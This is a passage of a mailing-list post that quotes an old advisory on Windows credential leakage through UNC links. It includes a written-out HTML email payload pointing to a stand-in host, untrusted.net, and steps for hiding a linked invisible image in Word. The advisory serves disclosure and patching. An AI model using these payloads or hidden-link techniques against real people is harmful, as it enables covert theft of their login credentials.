to set up the guest
account with no password to allow anonymous access to the server. Windows
will always try the cached credentials first. When the cached credentials
fail, a server will silently allow anonymous access and deliver the file.
IE will also take the UNC path format \\untrusted.net\share\pixel.gif.
Netscape (4.05) will not use this format.
Mail based attack:
Since most major mail programs on Windows support HTLM email using either
the Netscape or IE engine for display, this same attack can be delivered
by email. An HTML message with the following:
BODY background=file://untrusted.net/share/pixel.gif bgColor=#ff
NOSEND="1"
Will activate the attack when the user opens or previews the message. The
NOSEND attribute will probably keep Outlook from embedding the file in the
email message. This will ensure that the link is forwarded if the mail is
clever enough to get the initial recipient to forward it.
Obviously the mail-based version has the benefit of being directed at
targets. This has been successfully used during field-testing.
Document based attack:
Links can also be placed in Microsoft Word documents. To do this, open a
word document, choose Insert:Picture:From File. In the dialog box type the
UNC path for the file name. Check "Link to File" and uncheck "Save with
Document". Word does not accept the file:// URL.
This linking does not require any macros to run. If a small white graphic
is used the viewer will have no idea it is in the document.
Excel does not allow picture embedding in the same way.
Windows 95 downgrading LANMAN authentication:
According to Microsoft TechNet Bulletin Q165403, Windows 95 versions up to
and including OEM SR 2.1 can be tricked into downgrading authentication to
plaintext passwords. There is an update for W95 available. See:
http://support.microsoft.com/support/kb/articles/Q165/4/03.ASP
http://support.microsoft.com/support/kb/articles/Q165/4/03.ASP for
details. Without that patch these systems are extremely vulnerable.
Enterprises running W95 should verify their configurations. W98, NT4 sp3
or later and W2K are not vulnerable to plaintext downgrading.
major snip
Lawrence Kalmakoff
Ottawa, Ontario
DH/DSS Key ID: 0xA99FCC5F
--
--
View the TBUDL archive at http://tbudl.thebat.dutaint.com
To send a message to the list moderation team double click here:
mailto:[EMAIL PROTECTED]
To Unsubscribe from TBUDL, double click here and send the message:
mailto:[EMAIL PROTECTED]
--
You are subscribed as : archive@jab.org